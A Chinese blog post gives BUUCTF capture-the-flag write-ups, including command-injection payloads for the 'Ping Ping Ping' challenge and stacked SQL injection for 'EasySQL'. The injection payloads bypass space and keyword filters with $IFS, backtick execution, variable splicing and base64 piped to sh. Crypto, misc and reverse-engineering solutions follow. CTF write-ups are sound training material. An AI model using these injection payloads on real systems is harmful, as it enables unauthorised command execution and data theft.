BUUCTF-内联执行-变量拼接-base绕过-sql改||类型-*.1

已于 2023-04-09 21:01:42 修改
阅读量236 收藏
点赞数
分类专栏: BUUctf 文章标签: 网络 安全 centos
于 2023-03-30 13:03:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/129854884
版权

第五周 3.30

目录

web

[GXYCTF2019]Ping Ping Ping

1.内联执行

 2.变量拼接

3.base绕过

[SUCTF 2019]EasySQL

1*,1

 2.更改 || 类型

Crypto

摩丝

password

Misc

N种方法解决

乌镇峰会种图

Reverse

新年快乐

xor

web

[GXYCTF2019]Ping Ping Ping

ip 想到ping 在url上ping

 成功

?ip=127.0.0.1;ls

 发现flag文件 尝试访问

骂我们说明过滤了

我们先看看能不能访问index.php

发现也不行

开始尝试过滤

过滤空格
$IFS$9
${IFS}
$IFS$1

payload
127.0.0.1;cat$IFS$9index.php

成功 说明过滤了空格

/?ip=

PING 127.0.0.1 (127.0.0.1): 56 data bytes
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|
\{|\}/", $ip, $match);不能出现这些符号
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){ 不能出现//
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){ 不能出现/bush/
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ 不能出现有关flag的字
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?>

我们开始构造

1.内联执行

127.0.0.1;cat$IFS$9`ls`

``的作用就是将ls执行完返回 

相当于
127.0.0.1;cat$IFS$9flag.php,index.php

会返回命令执行完的

执行成功 源代码发现flag

 2.变量拼接

因为过滤了flag 所以我们将变量赋值 然后进行拼接

payload

127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
a= ag b = fa  变量赋值
$b$a   引用变量
相当于 flag

源代码中发现

3.base绕过

echo  输出命令
cat flag.php 进行base64  Y2F0IGZsYWcucGhw
base64 -d  解密base64执行 
sh 是shell命令语言解释器  通过这个执行base64 -d


所以payload

127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

| 为管道符 直接执行命令   |左边命令的输出就会作为|右边命令的输入

[SUCTF 2019]EasySQL

 打开环境

输入 1

 输入0

 我们尝试万能密码

1' or 1=1#

不行 我们继续尝试随便注学会的堆叠注入

1;show databases;
注意这里是  database s 要加上s

爆出库 接着爆表

1;show tables;

 得到 我们尝试直接获取flag

1;show columns from Flag;

 返回了nonono 说明过滤了 flag

我们开始猜测内置sql语句

输入 1 得到数据
输入 0 nonono

a||b   MYSQL 中 || = 或

1||1  = 1   1||0  = 1   0||0 = 0

所以我们猜测 
select 输入 || 列 from 表
select 1 ||flag from Flag

这样 如果输入正确 就会输出 1 
如果错误 就会输出 0 即 nonono

1*,1

我们猜到后台命令 我们可以尝试更改

select 1 ||flag from Flag
select *,1 ||flag from Flag

这样 就会返回所有的数据

 2.更改 || 类型

在mysql中  || 为 或

我们只要把 || 改为连接符就行了 他就会返回数值

sql_mode=PIPES_AS_CONCAT来转换操作符的作用
1;set sql_mode=PIPES_AS_CONCAT;select 1


select 1;set sql_mode=PIPES_AS_CONCAT;select 1 ||flag from Flag

 得到flag

Crypto

摩丝

password

姓名:张三 
生日:19900315

key格式为key{xxxxxxxxxx}
flag{zs19900315}

Misc

N种方法解决

下载改后缀得到

发现图片 和base64

搜索base64转图片 解码得到二维码

 查看后得到key

乌镇峰会种图

下载后得到图片

 确定只是图片

放入Stegsolve

 得到flag

Reverse

新年快乐

下载文件进行查壳

 发现是upx  我们使用upx脱壳

 放入ida32

反编译后得到代码

代码审计

{
  int result; // eax
  char v4; // [esp+12h] [ebp-3Ah]
  __int16 v5; // [esp+20h] [ebp-2Ch]
  __int16 v6; // [esp+22h] [ebp-2Ah]

  __main();
  strcpy(&v4, "HappyNewYear!"); v4替换为"HappyNewYear!"
  v5 = 0;
  memset(&v6, 0, 0x1Eu);
  printf("please input the true flag:");
  scanf("%s", &v5);
  if ( !strncmp((const char *)&v5, &v4, strlen(&v4)) )
判断flag
strncmp 是进行字符串比较 如果两个字符串相同 就输出0   !0=1 所以要相同
所以输入的是v4  就是HappyNewYear
    result = puts("this is true flag!");
  else
    result = puts("wrong!");
  return resul

所以flag就是

flag{HappyNewYear!}

xor

放入ida64 反编译

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *v3; // rsi
  int result; // eax
  signed int i; // [rsp+2Ch] [rbp-124h]
  char v6[264]; // [rsp+40h] [rbp-110h]
  __int64 v7; // [rsp+148h] [rbp-8h]

  memset(v6, 0, 0x100uLL);
  v3 = (char *)256;
  printf("Input your flag:\n", 0LL);
  get_line(v6, 256LL);
  if ( strlen(v6) != 33 )
    goto LABEL_12;
  for ( i = 1; i < 33; ++i )
    v6[i] ^= v6[i - 1];
  v3 = global;
  if ( !strncmp(v6, global, 0x21uLL) )
    printf("Success", v3);
  else
LABEL_12:
    printf("Failed", v3);
  result = __stack_chk_guard;
  if ( __stack_chk_guard == v7 )
    result = 0;
  return result;
}

我们查看成功语句 发现和v6有关 我们上去查看哪里有改v6的地方

 for ( i = 1; i < 33; ++i )
    v6[i] ^= v6[i - 1];

找到了 然后我们去查找 global

双击进去

继续双击

 得到了判断的

我们进行exp

s =['f',0xA,'k',0xC,'w','&','O','.','@',0x11,'x',0xD,'Z',';','U',0x11,'p',0x19,'F',0x1F,'v','"','M','#','D',0xE,'g',6,'h',0xF,'G','2','O']
flag='f'  #第一个不进行异或
for i in range(1,len(s)):
    if(isinstance(s[i],int)):              #判断s里的是不是int类型
        s[i]=chr(s[i])        #把int类型边为chr
for i in range(1,len(s)):
    flag+=chr(ord(s[i])^ord(s[i-1])) #根据题目进行异或运算
print(flag)

得到flag

flag{QianQiuWanDai_YiTongJiangHu}

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全学习笔记——代码执行漏洞bypass
just do it
07-25 136
这条命令使用了两个管道,利用第一个管道将 cat 命令(显示 passwd 文件的内容)的输出送给grep 命令,grep 命令找出含有“/bin /bash”的所有行。Linux 所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。使用内联执行会将 ``内的输出作为前面命令的输入,当我们输入上述 payload时,等同于 cat falg.php;操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
linux 重复进程,关于linux:Bash:内联执行返回重复的“进程”。 为什么?
weixin_29510921的博客
05-04 346
bash:4.3.42(1)-发行版(x86_64-pc-linux-gnu)执行以下脚本:# This is myscript.shline=$(ps aux | grep [m]yscript) # A => returns two duplicates processes (why?)echo"'$line'"ps aux | grep [m]yscript # B...
WEB-命令执行
yufengly1984的专栏
07-29 224
一、利用 | 连接ls等命令会执行ls查询文件 例如?ip=127.0.0.1|cat flag.php 存在过滤的情况就?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php //变量替换 也可以echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 先是将cat flag.php转换为Y2F0IGZsYWcucGhw这个base64编码,然后sh执行。 ...
BUUCTF的web方向题目(一)
wanan的博客
10-06 386
BUUCTF的web方向题目(一)
[GXYCTF2019]Ping Ping Ping
m0_56375816的博客
01-06 2472
观察页面 看到页面上没有什么输入点,只有一个/?Ip,题目又是ping,可能是ping地址,尝试把页面上的格式输入,再随便写一个地址,如/?ip=210.0.0.1 这与cmd中ping测试相似,但是真的ping是ping不通的,搜ip是有的,应该是一个开了禁ping的,方向应该是正确的。而且应该是假ping。 2.找文件 可以利用拼接命令,在/?ip=210.0.0.1后面用拼接符与查看命令连接起来 & 表示任务在后台执行,如要在后台运行redis-serv...
jquery.base64.js jquery-1.12.4.min.js
12-11
在Web开发中,Base64编码常用于图片的内联显示、加密数据传输以及JSON Web Tokens (JWT)的身份验证等场景。`jquery.base64.js` 提供了方便的API,使得开发者能轻松地在JavaScript中进行Base64的处理,特别对于中文...
image-tools图像转换工具,可用于图像和base64的转换
01-09
这款工具提供了便捷的图像和base64编码之间的转换功能,极大地简化了开发过程中的图像处理工作。 在前端开发中,我们经常遇到需要将图像文件转换为base64编码的情况。base64是一种数据编码方式,能够将二进制数据...
ideaIU-2020.3.4.exe试用包
03-24
2. **重构工具**:IDE提供了丰富的重构选项,如提取方法、变量,重命名,移动和内联等,帮助你安全地修代码结构,提高代码可读性和可维护性。 3. **版本控制集成**:与Git、SVN等版本控制系统无缝集成,可以轻松...
练习的工程Object-c-Excerise-master.zip
最新发布
02-05
3. **动态类型**:Objective-C支持运行时类型检查,这使得对象可以在运行时变其类型,增强了代码的灵活性。 4. **类别(Category)**:Objective-C允许通过类别为已有的类添加方法,而无需继承。这对于扩展系统类...
premailex:HTML电子邮件的预检-内联样式和纯文本
02-05
1. **Elixir** - 这是一个函数式编程语言,基于 Erlang VM,常用于构建分布式、容错和实时系统,包括 web 应用程序。 2. **Phoenix** - 这是 Elixir 社区的一个 Web 开发框架,类似于 Ruby on Rails,用于快速开发高...
[GXYCTF2019]Ping Ping Ping1
pie002的博客
03-24 657
点进来以后是一个url get传参的形式,输入一个ip,然后尝试用;拼接linux命令;拼接的前后两个命令都会被执行用ls查看当前目录下的文件,发现有两个文件。
BUUCTF[GXYCTF2019]Ping Ping Ping 1
徐海洋
02-01 362
[GXYCTF2019]Ping Ping Ping 1
BUUCTF 5
qq_52431855的博客
01-18 108
知识点 拼接符 & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1‘ && echo ‘2’ | 表示管道,上一条命令的输出,作为下一条命令参数,如 echo ‘yes’ | wc -l || 表示上一条命令执行失败后,才执行下一条命令,如 cat nofile || echo “fail” ; 分号表示命令依次执行绕过正..
BUUCTF web刷题
akxnxbshai的博客
04-02 1336
目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [SUCTF 2019]EasySQL [ACTF2020 新生赛]Exec [极客大挑战 2019]Secret File [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]Knife [极客大挑战 2019]Upload [ACTF2020 新生赛]Upload
ping cat.flag.php,【学习笔记1】buu [GXYCTF2019]Ping Ping Ping
weixin_28728495的博客
03-26 500
打开网站后,一眼就看到这样的提示,让你传个ip,传一下试试是什么,这里我们就用127.0.0.1试试发现这是这是ping了一下传的ip,那这就是经典的命令执行了,首先执行ls看看都有什么文件有flag.php,index.php两个,很明显flag就在flag.php里,首先所以可以尝试构造怕payload/?ip=127.0.0.1|cat flag.php不行,返回了这个/?ip= fxck ...
CTFbuuctf web(一)——命令执行
m0_52923241的博客
07-26 2387
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
内联函数与普通函数区别&可执行文件结构介绍
abamon的专栏
09-21 1128
一些基本知识回顾: 1、内联函数与普通函数的区别: 普通函数在编译后会被放到代码段,然后函数执行过程中调用普通函数是需要先压栈,然后根据函数调用地址调用函数,函数返回后执行出栈操作。这样就会存在一个调用过程,有时间消耗(对于频繁调用的子函数就可以考虑写成内联函数的形式)。 而一个内联函数在编译后会将函数代码插入到调用处,这样虽然会增加代码段的空间(内联函数的代码出现在
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2720
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
JVM系列之:深入学习方法内联
Herishwater的博客
03-24 1185
在前面多篇文章中多次提到方法内联,作为编译器最重要的优化技术,该技术不仅可以消除调用本身带来的性能开销,还能够触发更多的优化。本文将带领大家对该技术一探究竟。 方法内联 方法内联指的是:在编译过程中遇到方法调用时,将目标方法的方法体纳入编译范围之中,并取代原方法调用的优化手段。 以 getter/setter 为例,如果没有方法内联,在调用 getter/setter 时,程序需要保存当前方法的执行位置,创建并压入用于 getter/setter 的栈帧、访问字段、弹出栈帧,最后再恢复当前方法的执行。而当内
Programming in Objective-C (6th Edition)
04-06
英文第六版

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值